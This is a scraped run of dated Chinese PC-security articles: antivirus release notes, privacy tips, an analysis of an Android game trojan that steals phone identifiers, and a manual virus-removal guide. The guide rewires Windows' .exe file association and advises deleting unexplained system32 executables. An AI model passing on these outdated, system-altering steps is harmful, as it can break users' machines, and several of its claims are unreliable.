/>目標程序,來達到啟動病毒和禁用工具的目的。<br />&nbsp;&nbsp;</div><div><strong>解決方法:</strong>到此目錄下,把我們的工具從黑名單里拖出來就可以了(刪掉唄)<br /></div><p><br /></p><div>七、重裝系統都無法解決的病毒問題<br />&nbsp;&nbsp;&nbsp;&nbsp;很多人認為中病毒了,重裝系統就可以解決了,其實不然,有些病毒強制修改IE,設置默認首頁,即使你重裝了系統后仍然無法解決。方法是:把java虛擬機停掉后病毒就不會<br />發作了,然后再結束進程。<br /><br /><strong>具體步驟:</strong>在internet選項中,把有關java的vm的啟動項全部去掉即可。</div> [安全產品]360安全衛士8.6beta3新增注冊表清理獨立應用 http://www.pirinnaturalssoapandspa.com//html/14798_1.html 西西 安全產品 2012/3/6 18:06:41 <p>360安全衛士8.6beta3版本發布,該版本將注冊表獨立了出來,并在安全性方面做了很大的優化,下面跟隨筆者一起體驗下新版360衛士的注冊表清理功能到底有何不同。</p><p><strong>1.新版部分功能安裝后需重啟方可使用&nbsp;</strong></p><p>360安全衛士8.6beta3版的安裝和以往略有不同,部分功能(主要是注冊表清理)需要重啟后方可使用,如圖(1)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084779787.jpg" /></p><p>圖(1)</p><p>未重啟的機器清理注冊表功能是無法加載成功的,如圖(2)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084784868.jpg" /></p><p>圖(2)</p><p>注冊表清理和一鍵清理、清理垃圾等功能一樣成為一個獨立的部分,重啟后注冊清理功能可正常使用,如圖(3)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084728783.jpg" /></p><p>圖(3)</p><p><strong>2.注冊表清理更安全、人性化&nbsp;</strong></p><p>360安全衛士舊版亦有注冊表清理功能,不過默認一鍵清理不包含注冊表清理,但其注冊表的默認清理選項并不太完善,只是籠統的將掃描出的注冊表問題一律清理掉,8.5beta版的注冊表清理掃描結果如圖(4)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084785132.jpg" /></p><p>圖(4)</p><p>8.6beta3版的注冊表清理更加安全,只默認清理確實無用的注冊表項,對于8.5beta版中的某些選項提示謹慎清理,如圖(5)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084813226.jpg" /></p><p>圖(5)</p><p>清理結果也較之前版本少了許多,如圖(6)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084880265.jpg" /></p><p>圖(6)</p><p>注冊表清理有風險,在清理之前最好對其進行備份。360安全衛士的注冊表清理功能在執行完清理后會自動對注冊表進行備份,點擊還原即可將注冊表還原到之前模樣,簡單安全,如圖(7)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084852486.jpg" /></p><p>圖(7)</p><p><strong>總結:&nbsp;</strong></p><p>360安全衛士8.6beta3的注冊表清理更加的安全、人性化,注冊表清理選項的選擇更加的謹慎安全;注冊表清理完成后自動備份功能確保注冊表安全無憂。</p> [防護教程]QQ電腦管家保護用戶隱私三部曲 http://www.pirinnaturalssoapandspa.com//html/14459_1.html 西西 防護教程 2012/2/9 17:57:22 <p>自從去年發生了多起隱私泄露事件之后,保護隱私越來越被廣大互聯網用戶所重視。保護隱私的方法其實有很多種,例如清除上網痕跡、給文件夾加密、安裝安全防護軟件等等??雌饋硭坪跤行┓爆?,其實用QQ電腦管家就可以全部搞定了。 </p><p><strong>清除使用痕跡中的隱私信息</strong></p><p>在計算機運行的過程中,為了方便用戶再次使用,系統或程序往往會自動保存用戶操作的歷史記錄,比如瀏覽過的網頁、看過的電影節目、編輯過或者打開過的文檔等,這些記錄就是你的使用痕跡。</p><p>使用痕跡可能包含了你的個人隱私信息,一旦其他人使用我們的電腦,就有可能通過歷史使用痕跡獲取你的個人隱私。因此,定期清理使用痕跡可以有效地保護個人隱私,防止他人根據使用痕跡來了解你的上網操作。</p><p>在QQ電腦管家的“系統優化”中有“清除痕跡”的入口,點擊“查看詳情”即打開“清除痕跡”功能窗口。</p><p><br /><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584764174.jpg" /></p><p>打開QQ電腦管家清除痕跡功能</p><p>選擇要清除的使用痕跡,點擊右下角的“開始掃描”。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584865443.jpg" /></p><p>掃描要清除的痕跡</p><p>掃面完成之后會列出使用痕跡,再次確認需要清理的項目,點擊右下角的“立即清理”即可。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584822043.jpg" /></p><p>清除掃描出的使用痕跡</p><p><strong>小提示:</strong></p><p>QQ電腦管家可以刪除的使用痕跡比較全面和細致,但并是將所有痕跡都清除就是最好的方式。因為有些“痕跡”可以記錄我們的使用習慣,一旦清除,再用到時就要重新設置,反而給使用帶來了不便。所以建議大家在選擇要清除的使用痕跡時,盡量不要“全選”,而是點擊“推薦選項”,QQ電腦管家會幫你保留那些有益無害的痕跡。<br /><br />QQ電腦管家2012新春版:<a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html">http://www.pirinnaturalssoapandspa.com/soft/11253.html</a></p> [病毒漏洞]安卓“推箱子”帶木馬 安全管家Hold住 http://www.pirinnaturalssoapandspa.com//html/14448_1.html 西西 病毒漏洞 2012/2/9 9:01:26 <p>專業手機殺毒軟件<a href="http://www.pirinnaturalssoapandspa.com/soft/33687.html" target="_blank">安全管家</a>查殺安卓 “推箱子木馬”,將惡意代碼內嵌到“推箱子”手機游戲軟件中,發布在安卓各個市場和論壇,進行擴散。</p><p>木馬惡意行為:</p><p>“推箱子木馬”私自下載流氓軟件并靜默安裝(流氓軟件為偽裝的谷歌地圖),且無法刪除流氓軟件,并將手機的IMSI、IMEI、手機號碼上傳至病毒服務器。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023439912.gif" /><br /></p><p>木馬行為分析:</p><p>“推箱子木馬”在電話信號強度,電量變化,開機自啟三個廣播接收后啟動服務UpdateService執行惡意行為。</p><p>&nbsp;&nbsp;&nbsp; 1.如果手機已經ROOT,該軟件會請求獲取ROOT權限,從而更進一步的觸發流氓行為,&nbsp;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;2.如果手機未打開USB調試功能,則該軟件會誤導用戶打開USB調試功能,以便為其下一步操作做準備,表現如下:</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023531332.gif" /><br /></p><p>&nbsp;&nbsp;&nbsp; 3.該軟件會請求網絡連接,判斷是否可以正常連接網絡,</p><p>&nbsp;&nbsp;&nbsp; 4.一旦網絡鏈接成功,即可從流氓服務器下載流氓軟件,并將該流氓軟件存放在SD卡根目錄下,命名為“idb.apk”。即使用戶將該文件刪除,該流氓軟件依然會重新下載。</p><p>&nbsp;&nbsp;&nbsp; 5.流氓軟件被下載后,會被安裝到ROM中,即路徑/system/app/路徑下,在此可以看到下載的流氓軟件包名為“com.google.map”,屬于盜版的谷歌地圖軟件。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023520906.gif" /></p><p>溫馨提示:</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在安卓手機游戲中內嵌惡意代碼的行為是手機病毒制造者最常采用的行為之一,安全管家提示用戶:安裝軟件要慎重,</p><p>用戶可以下載安裝手機殺毒軟件-<a href="http://www.pirinnaturalssoapandspa.com/soft/33687.html" target="_blank">安全管家</a>,利用病毒查殺功能,進行病毒檢測和刪除。安全管家病毒檢測中心人員建議,用戶需及時更新病毒庫,定期給手機進行體檢,確保手機安全使用。<br /><br />安全管家安卓版:<a href="http://www.pirinnaturalssoapandspa.com/soft/33687.html">http://www.pirinnaturalssoapandspa.com/soft/33687.html</a></p> [安全產品]QQ手機管家創立六大手機安全標準 保護用戶隱私 http://www.pirinnaturalssoapandspa.com//html/14205_1.html 西西 安全產品 2012/1/14 17:57:48 <p>近日,一條有關丟失iPhone 4s丟失的微博在網絡上熱轉,一女生撿到iPhone 4s手機之后,沒有物歸原主,反而興致勃勃地玩起自拍,可沒料到,此手機的icloud云服務功能,自動將照片同步到了云端的照片流里,然后又同步給了失主。于是,失主同時發現了此“撿拾者”用iPhone 4s自拍的照片,并將照片上傳到了網上。</p><p><img alt="" src="https://pic.cr173.com/up/2012-1/2012011417550113221.jpg" /></p><p>這個“微博事件”再次引發用戶對智能手機隱私安全問題的思考:隨著智能手機的用戶越來越多,用戶手機上的個人隱私內容也越來越多,包括私密短信、自拍照片、視頻等等,而智能手機又與網絡無縫對接,意味著隱私數據隨時都有泄露危險,隱私保護迫在眉睫。</p><p>有調查數據顯示超過三分之一的用戶在使用智能手機時最擔心隱私信息泄漏,其次是安全問題占26%。畢竟智能手機強大的拍照、攝像、聯網功能,因此包含了使用者大量個人隱私,一旦泄露將惹來大麻煩。所以想辦法杜絕手機隱私泄露變得至關重要。</p><p>網絡隱私泄露已經司空見慣,而且許多案例都刺痛我們的神經?!癤臥底”竊聽軟件、手機丟失遭遇艷照門、CIQ偷窺用戶隱私、CSDN等網站用戶賬戶信息泄露……<br /><br /><strong>QQ手機管家打造隱私保護六大標準</strong></p><p>如果對手機隱私進行匯總和歸類的話,應該包括手機聯系人、通話記錄、短信、照片、視頻文檔的丟失或者泄露,此外,手機病毒偷窺用戶隱私,竊聽電話,將手機用戶重要資料偷偷上傳至指定服務器也是手機隱私問題的重點。</p><p>對此,騰訊移動安全實驗室工程師表示:“面對日益嚴峻的手機隱私安全問題,QQ手機管家已經擁有全面的對策,并且全球第一個發布了‘隱私安全保護’標準。目前QQ手機管家(Android)3.1已經全面支持六大隱私保護?!?lt;/p><p>其一,“隱私監控”標準。對于竊聽類病毒軟件,可以通過“防竊聽”再配合“隱私監控”對每一款應用的運行實時監控;</p><p>其二,“手機防盜”標準。對于更多的手機丟失造成的信息泄露,QQ手機管家強大的“手機防盜”功能可以遠程刪除手機所有數據、遠程鎖機、手機定位,幫助用戶保護手機隱私,也有很多用戶通過QQ手機管家防盜功能找回了丟失的手機。</p><p>其三,“私密保護”標準。對于重要手機聯系人短信和通話記錄,則可以通過“私密空間”設置密碼保護;</p><p>其四,“帳號保護”標準。手機令牌功能可以對QQ帳號登錄保護,并保護Q幣和游戲帳號等虛擬財產。</p><p>其五,“強化密碼保護”標準。通過“密碼強度驗證器”可以幫助用戶驗證密碼強度,保護網絡帳號安全。</p><p>其六,“防丟失”標準。為了應對手機聯系人和重要短信丟失,QQ手機管家的“通訊錄備份”功能還可以實現網絡存儲,防丟失。</p><p>雖然智能手機時代隱私安全問題越來越嚴重,但并不意味著就沒有解決方案。為手機下載安裝專業的安全軟件,并開啟各類手機隱私保護功能,自然可以安心使用智能手機。同時,我們也呼吁相關立法機構加大對手機隱私保護立法的研究,呼吁手機安全廠商加大手機隱私保護功能研發力度,共同維護手機隱私安全。</p><p><strong>讓人觸目驚心的隱私泄露案例</strong></p><p>2009年8月10日央視《新聞30分》對手機竊聽進行了報道,新聞中一款名叫“X臥底”的軟件,除了具備一般監聽功能外,還能安裝在電腦上或手機上遠程監控,哪怕是對方手機處于待機狀態,周圍的環境聲也能聽到,這讓很多手機用戶都不寒而栗。</p><p>2011年11月,曾經深陷艷照門的香港明星陳冠希又惹新艷照門事件,與16歲嫩模親密照被泄露于網絡。而該事件的起因在于嫩模手機丟失后,手機中的照片被曝光。雖然比不上2008年的艷照門風波,但是讓很多愛拍一族,時刻擔心手機丟失惹上麻煩。</p><p>2011年12月4日,有國外媒體報道一款名為“Carrier IQ間諜軟件”的間諜軟件被安裝在眾多知名品牌手機中,可以時刻監控手機用戶的所有操作,并有可能將手機內容上傳至網絡,讓手機用戶對隱私泄露產生恐慌。</p><p>2011年12月21日,國內最大的程序員社區網站CSDN被爆出有超過600萬用戶的注冊資料遭泄露。隨后又曝出人人網、開心網、新浪微博等多家網站的用戶信息也被泄露,這是有史以來最嚴重的網絡隱私泄露事件,而互聯網與移動互聯網正在融合,手機網站隱私泄露問題也廣受關注。<br /><br />各平臺QQ手機管家:<a href="http://www.pirinnaturalssoapandspa.com/tags_QQ%CA%D6%BB%FA%B9%DC%BC%D2.html">http://www.pirinnaturalssoapandspa.com/tags_QQ%CA%D6%BB%FA%B9%DC%BC%D2.html</a></p> [系統安全]改變exe文件關聯法手工清除頑固 http://www.pirinnaturalssoapandspa.com//html/13833_1.html 西西 系統安全 2011/12/16 17:00:41 1、改變.exe文件的文件關聯 命令:ftype exefile=notepad.exe %1<br /><br />2、重啟系統判斷記事本打開的所有文件,排除系統文件后。轉到文件位置即可清除!<br /><br />3、恢復文件關聯 <br /><br />右擊任何文件選擇“打開方式”選擇CMD.exe 即可打開命令提示符窗口<br /><br />輸入命令ftype exefile=%1 %* 即可恢復文件關聯。<br /><br /><br /><br />總結手工殺毒步驟如下:<br />  1、手工下載并收藏所有SP5單個小文件(就win2k而言,合共已有近100M)<br />  2、斷開網絡<br />  3、重啟到安全模式<br />  4、檢查并清除【HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*】各不明啟動項鍵值<br />  5、檢查并清除【HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*】各不明啟動項鍵值<br />  6、查不明服務并禁止之,如無,繼續步驟7;如有,禁止后,回到步驟3。<br />  7、重點查【%SystemRoot%\system32\】目錄下所有隱藏exe、com,檢查其屬性,不明來歷者刪無赦(可先放回收站,重啟沒事后再清除)。<br />  8、在更新最新病毒庫后不妨用殺毒軟件掃描系統盤所有文件一次。<br />  9、確認SP4已安裝的基礎上打全所有SP5補丁<br />  10、重啟到正常模式使用<br />  注:由于判斷是否非法程序需要一定經驗,特提供一簡單辦法:點擊可疑程式查閱【屬性】,正常程式都在【版本】欄附帶有公司名、版本、版權等信息,就算是3721、敗毒等垃圾也帶有相應的信息,而蠕蟲、木馬等程式則極大可能無任何信息可供查閱、參考,據此可判斷大多數非法程序。 [安全產品]360殺毒3.0正式版 全面支持64位Windows操作系統 http://www.pirinnaturalssoapandspa.com//html/13741_1.html souwiz 安全產品 2011/12/8 10:28:24 <p>我們今天發布了360殺毒3.0.0.2121正式版,為您帶來強勁提速的全盤掃描,全面的64位支持,以及更快的啟動速度。<br /><br /><span style="color:#ff0000;">360殺毒 64位下載地址</span>:<a href="http://www.pirinnaturalssoapandspa.com/soft/2513.html">http://www.pirinnaturalssoapandspa.com/soft/2513.html</a>&nbsp;(64位用戶直接覆蓋安裝即可)<br /><br /><strong>全盤掃描智能加速,掃描時間縮短30%以上</strong><br />我們深知您的時間寶貴,因此在本版本引入了360安全中心最新的“SmartScan掃描智能加速”技術,為您帶來強勁提速的全盤掃描體驗。只要您進行過一次完整的全盤掃描,之后再次掃描時,平均掃描時間縮短30%以上。<br /><br /><img height="457" src="https://pic.cr173.com/up/2011-12/20111212881026452383.jpg" width="528" alt="" /><br /><br />32位下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/2305.html">http://www.pirinnaturalssoapandspa.com/soft/2305.html</a></p><p><strong>更快的啟動速度,更輕巧的資源占用</strong><br />新版本對360殺毒的防護服務架構做了大幅技術優化,360殺毒啟動速度更快,并減少對電腦開機時間的影響。此外,新版本對360殺毒的資源占用進行了更進一步優化,您會發現360殺毒對系統CPU和內存的占用更輕巧了。<br /><br /><img height="458" src="https://pic.cr173.com/up/2011-12/20111212881026003830.jpg" width="528" alt="" /><br /><br /><strong>全面支持64位Windows操作系統</strong><br />隨著新版本的發布,使用64位Windows操作系統的用戶將可以同步體驗360殺毒的全部功能。360殺毒的實時防護功能均已支持64位系統,并包含領先的原生64位驅動級虛擬隔離沙箱。<br /><br /><img height="457" src="https://pic.cr173.com/up/2011-12/20111212881025361689.jpg" width="527" alt="" /><br /></p> [安全產品]360安全衛士新增360云盤 新增圣誕皮膚! http://www.pirinnaturalssoapandspa.com//html/13740_1.html 西西 安全產品 2011/12/8 9:37:40 <p><strong>hi~大家好<br /><br /></strong>  <strong>360安全衛士8.5beta版本發布,趕快來體驗吧!</strong><br /><br />  <strong>發布版本</strong>:(<strong>v8.5.0.1001-beta</strong>)<br /><br />  <strong>下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/2855.html">http://www.pirinnaturalssoapandspa.com/soft/2855.html</a><br /></strong><br />  <strong>主要功能更新如下</strong>:<br /><br />  <strong>【360云盤】New!每天限量發放體驗資格!快快來體驗吧!</strong><br /><br />  功能大全新增360云盤,可把珍藏的照片,工作的文檔和美妙的音樂存在云盤,無需U盤即可讓隨時隨地觸手可及。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390775123.jpg" /><br /><br />  <strong>【U盤防護】</strong><br /><br />  <strong>新U盤防護支持Windows7x64平臺</strong><br /><br />  1、插入U盤時自動產生相應盤符的桌面圖標,讓您方便開啟U盤與退出U盤;<br /><br />  2、提供安全退出的功能,讓您退出U盤不再擔心數據是否丟失。<br /><br />  <strong>【圣誕皮膚閃亮登場】</strong><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390735600.jpg" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/450_21/22/01/03/2201039q4c8.b980ee.jpg" /><br /><br />  <strong>【開機小助手新增開機任務功能】</strong><br /><br />  繁忙的您,還在為開機后滿桌面找不到需要打開的程序發愁嗎?<br /><br />  還在為一個一個的打開程序而煩惱嗎?<br /><br />  現在,有了開機任務一鍵幫您輕松搞定!<br /><br />  今后,開機后想干啥!就干啥??!<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/550_500/2f/02/02/2f02022q2746.56a5ef.png" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/850_600/2b/02/02/2b02024q280c.9fbcd8.png" /><br /><br />  <strong>【軟件管家】</strong><br /><br />  1、改進手機必備選擇框,文字提示更加易懂;<br /><br />  2、優化手機必備下載問題;<br /><br />  3、不常用軟件新增忽略功能,對不想提示軟件可以設置不再提醒。<br /><br />  <strong>【系統修復】</strong><br /><br />  1、增強QQ面板上的鏈接打不開的修復;<br /><br />  2、新增開機登錄窗口無法關閉系統的修復。<br /><br />  <strong>【360省電助手】</strong><br /><br />  &#8226;幫您減少10%-15%的電費開支<br /><br />  &#8226;幫您更方便快捷的調整顯示器亮度(需要硬件支持)<br /><br />  &#8226;實時展現省電度數,精確到小數點后5位,點滴努力看得見<br /><br />  &#8226;輕松關閉不常用的硬件,既省電又能更延長硬件的壽命<br /><br />  &#8226;特有的離開模式,讓你在掛游戲或者通宵下載時更省電<br /><br />  &#8226;通過減少電腦的電能消耗,從而減少全球發電能源的消耗<br /><br />  <strong>注</strong>:安裝完后需重啟電腦以便新功能生效。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390926756.jpg" /><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390943582.jpg" /><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391016857.jpg" /><br /><br /><br />  <strong>【360密碼安全鑒定器】</strong><br /><br />  擔心自己密碼被猜到?趕緊試試360密碼安全鑒定器,看看您的密碼是否安全。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391145955.jpg" /><br /><br />  <br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391179606.jpg" /><br /><br />  提示:<br /><br />  1.本軟件僅在本地檢測密碼強度,不會上傳或保留任何檢測痕跡,確保您輸入的信息不會泄露。<br /><br />  2.密碼強度得分不設100分,最高分為95分。因為密碼強弱只是影響帳號安全的一個因素,黑客盜號還可能通過木馬、釣魚網站,甚至直接攻擊網站服務器,竊取用戶帳號密碼數據。在這些情況下,再強的密碼也無法避免失竊的風險。為電腦做好安全防護措施,分級管理密碼、定期更換密碼,才是全面保護帳號的有效措施。<br /><br />  <strong>【主程序:經驗值等級】</strong><br /><br />  1、修正跨天經驗值比例問題;<br /><br />  2、增加用戶等級與任務設置。<br /><br />  <strong>【電腦清理】</strong><br /><br />  1、增加一鍵清理功能,讓系統運行更有效率;<br /><br />  2、增加自動清理功能,自動幫您在空閑時間清理電腦中的垃圾和痕跡,讓系統更加流暢。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391128865.jpg" /><br /><br />  <strong>【360(91)手機助手安卓版】</strong><br /><br />  1、優化進程管理;<br /><br />  2、修正手機助手下載目錄重復創建的問題;<br /><br />  3、優化了系統菜單設置界面。<br /><br />  <strong>【360寢室必備】</strong><br /><br />  看看寢室里誰在占網速?<br /><br />  是兄弟,就一起曬出自己的網速,合理使用寢室網絡帶寬。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/424_461/24/02/b2/2402b2eq24df.6c242c.png" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/424_461/29/02/b4/2902b4eq24cb.2e882c.png" /><br /><br />  <strong>【360U盤鑒定器】</strong><br /><br />  如今,U盤、SD卡已經成為大家最經常使用的移動存儲設備,然而各種小容量冒充大容量的縮水U盤也在市場上大肆猖獗。相關數據顯示,每12個U盤中就有一個縮水U盤!這種縮水U盤在電腦上顯示的也是虛假容量,極難發現。你手上的U盤是否“被縮水”了?近日,360安全衛士推出了一項U盤真實容量鑒定功能,就能徹底消除你的“被縮水”擔心。<br /><br />  <strong>縮水U盤的危害</strong><br /><br />  部分人可能認為縮水U盤只是真實容量比標示容量小,也能使用。然而實際上縮水U盤的危害遠不止這個,更嚴重的是不知不覺讓您的重要數據丟失!請看下面這個案例:<br /><br />  北京的王先生前段時間在網上買了個16G的U盤。因為工作需要,他將很多數據表格、文檔拷入U盤,這時一切正常。但是當他打開文件的時候,悲劇發生了:U盤里的全部文件已經損壞,無法打開。這些文件的丟失造成了工作延誤,王先生年底的獎金肯定泡湯了。后來王先生找朋友幫忙檢測,才發現所謂16G的U盤,實際容量只有128M。<br /><br />  <strong>準確識別各種縮水U盤</strong><br /><br />  下載360安全衛士最新版,在功能大全找到并打開“360U盤鑒定器”,插上您的U盤就能開始檢測;<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391190559.jpg" /><br /><br />  耐心等待之后,不論造假技術多么高明的各種縮水的U盤都現身了:<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391122993.jpg" /><br /><br />  <strong>【新增:經驗值等級】</strong><br /><br />  1、從現在起,使用安全衛士可以獲得經驗值啦!<br /><br />  2、Beta版第一批開放5個任務,包括打開安全衛士、保持在線、安全體檢、一鍵優化、清理垃圾等。(點擊查看詳情 )<br /><br />  3、完成任務可獲得經驗值,每積累到一定經驗值即可升級,更可獲得代表等級的炫酷標志。(了解等級詳情 )<br /><br />  4、達到一定等級后,將來可獲得各種獎勵和特權(即將開放)<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391145427.jpg" /><br /><br />  <strong>【系統修復】</strong><br /><br />  完善對于惡意開始菜單和桌面快捷鍵的掃描和處理。<br /><br />  <strong>【電腦門診】</strong><br /><br />  1、新增任務欄位置發生變化的修復;<br /><br />  2、新增桌面上“我的電腦”圖標消失后的修復。<br /><br />  3、增加對桌面和開始菜單里設置了可疑快捷方式的清除。<br /><br />  <strong>【360U盤防護】</strong><br /><br />  1、U盤防護增加對多分區U盤的支持;<br /><br />  2、U盤防護增加對移動硬盤的支持。<br /><br />  <strong>【360U盤防護】</strong><br /><br />  “趕時間,結果U盤彈出總是一遍又一遍失敗,直接拔出又怕數據丟失,耽誤事兒,真煩!”<br /><br />  “明明所有的文件都關掉了,為什么還是提示無法彈出U盤?”<br /><br />  “偶爾直接拔出,結果發現U盤就不識別了……送去維修,結果是U盤壞了,只能重新買,花了好多銀子買的?。。?!”<br /><br />  “系統總是提示正在使用我的U盤,又不告訴我是哪些程序在使用,又不敢直接拔,這讓我怎么辦?”<br /><br />  “聽說最近很多病毒、木馬通過U盤傳播,我插上U盤就有恐慌,不敢直接打開,怕??!”<br /><br />  嘿嘿,還在苦惱么?那就趕緊來試試360U盤保鏢吧*^-^*:<br /><br /> ?。?)桌面U盤快捷方式,打開U盤更快捷更清楚;<br /><br /> ?。?)U盤右鍵安全彈出,占用程序、被占用的文件一目了然,讓您揪出偷偷占用U盤的“幕后黑手”;<br /><br /> ?。?)U盤彈出之前溫馨的保存提醒,以免丟失正在編輯的文檔;<br /><br /> ?。?)安全彈出U盤,不會對您的U盤和電腦造成任何損傷,從此不再夜夜擔心小U“掛掉”;<br /><br /> ?。?)U盤插入后閃電云查殺,病毒、木馬統統遠離電腦,保護電腦、U盤安全。<br /><br />  <strong>溫馨小提示:</strong><br /><br />  1、U盤防護目前僅支持WindowsXP/Vista/Windows732位系統下U盤無分區的情況,其他系統及多分區U盤目前正在努力支持中,敬請期待?。海?lt;br /><br />  2、安裝完后需<strong>重啟電腦</strong>,新U盤防護功能才能生效。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/1000_650/22/02/f3/2202f33q22ed.df3de4.png" /><br /><br />  <strong>【郵件保鏢-360首創郵件保護】</strong><br /><br />  防郵件釣魚、防郵件惡意鏈接、防附件木馬<br /><br />  支持網易163郵箱、QQ郵箱、Outlook等12種在線郵箱和郵件軟件<br /><br />  “經常收到中獎郵件,點了郵件內的鏈接結果被騙,損失了好多錢?”<br /><br />  “附件打開后,莫名其妙就中了木馬?”<br /><br />  “收到交友郵件,很感興趣,點擊后結果發現電腦越來越慢?”<br /><br />  “看到郵件內的東西很便宜,結果點了之后就開始彈出很多廣告?”<br /><br />  “點了陌生人郵件里面的鏈接,主頁被莫名其妙的換掉,而且還改不回來?”<br /><br />  “點了群發郵件里面的鏈接,結果就給我裝了好多軟件,還卸載不掉?“<br /><br />  以上問題是否困擾經常使用郵箱的您很久?<br /><br />  為此,360特強勢推出360郵件保鏢,全面保護郵箱安全!<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391219313.jpg" /><br /><br />  1、附件安全檢測:智能監控附件木馬、病毒威脅,加固入口防護;<br /><br />  2、郵件防欺詐:云端檢測虛假鏈接或釣魚網頁,保護個人財產;<br /><br />  3、郵件防掛馬:快速識別掛馬鏈接和網頁,強化郵箱安全。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391247355.jpg" /><br /><br />  <strong>【局域網防護】</strong><br /><br />  宿舍、合租、無線上網時網速突然變慢,經常掉線,看網頁時頻繁中木馬,很有可能是所在的局域網內發生了網絡攻擊。作為局域網、無線網這一重要安全入口,360升級了局域網防護(ARP防火墻3.0),新版強化了網關保護、ARP主動防御,能夠主動抵御新的局域網攻擊工具、木馬的攻擊。同時,局域網防護X64版本使用了系統底層兼容防護技術,開啟時無需重啟電腦,讓您最快速體驗到X64版局域網防護之強悍。新版功能如下,歡迎大家測試使用:<br /><br />  試用方法:360安全衛士——功能大全——流量防火墻——局域網防護<br /><br />  1、優化了自動綁定網關、ARP主動防御、IP沖突攔截、對外ARP攻擊攔截等功能;<br /><br />  2、解決了部分用戶無法開啟局域網防護(ARP防火墻)的問題;<br /><br />  3、局域網防護設置更簡單,防護項目一鍵開啟;<br /><br />  4、局域網狀態、防護狀態、防護日志展現更直觀,實時了解局域網內上網環境;<br /><br />  5、減少系統資源占用。<br /><br />  6、強力防御模式:可抵御任何局域網攻擊,讓號稱“可突破任意ARP防火墻”的幻境網盾等軟件們不再危害局域網,局域網上網更舒心;<br /><br />  7、局域網隱身模式:WinXP、2003系統下局域網隱身模式,讓攻擊者無法掃描到您的電腦,從而免受局域網攻擊,局域網上網更放心。<br /><br />  <strong>【360云恢復】</strong><br /><br />  在使用電腦的過程中,隨時可能出現死機、硬件損壞、系統崩潰需要重裝等意外故障。<br /><br />  這些意外會導致上網賬號,系統設置,常用軟件等重要資料丟失。輕則耽誤時間重新設置,重新安裝軟件,重則丟失上網賬號無法上網,丟失收藏的網站等等。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/638_313/21/02/83/2102837q101f.cdb41e.png" /><br /><br />  360云恢復提供無限免費空間,為您可靠保存支持一鍵備份和恢復系統核心文件、IE首頁、IE收藏夾、桌面壁紙、ADSL賬號、Host設置、應用軟件等重要數據。即便電腦遇到意外或者重裝系統,也能快速將資料恢復,避免損失。<br /><br />  <strong>【功能大全——360閃電云鑒定器】</strong>(點擊查看360閃電云鑒定器詳細介紹 )<br /><br />  360閃電云鑒定器基于360安全中心獨創的“云QVM”技術,能在極短時間內鑒定最新病毒,絕大部分文件甚至都不需要上傳。運用領先的“云QVM”鑒定技術,僅需獲取文件的微小信息點,就可鑒定最新病毒文件。無論病毒采用何種加殼、變形技術,都難逃云鑒定器的“閃電慧眼”。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391286615.jpg" /><br /><br />  <strong>【360任務管理器】</strong><br /><br />  1、幫助您詳細了解和查看各系統進程、系統服務,讓任務管理器更簡單易懂;<br /><br />  2、幫助您便捷關閉各系統進程、系統服務,同時優化內存,加快電腦運行速度;<br /><br />  3、方便您實時掌握電腦資源利用狀況,系統性能一目了然。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/680_605/28/02/02/280202eq965.a08d0f.png" /><br /></p> [安全產品]新加坡安全衛士Toolwiz Care評測 http://www.pirinnaturalssoapandspa.com//html/13647_1.html x-berry 安全產品 2011/12/1 9:10:34 <p>Toolwiz Care是新加坡Toolwiz團隊開發的系統優化工具套裝。類似于國內的360安全衛士,金山衛士或者QQ電腦管家。Toolwiz Care最近在國內算是比較熱門的軟件,也有讀者曾經留言讓我去體驗一下,再加上網上一致的好評,促使我一探究竟。</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111513191.jpg" /></p><p><a href="http://www.pirinnaturalssoapandspa.com/soft/36371.html" target="_blank">Toolwiz 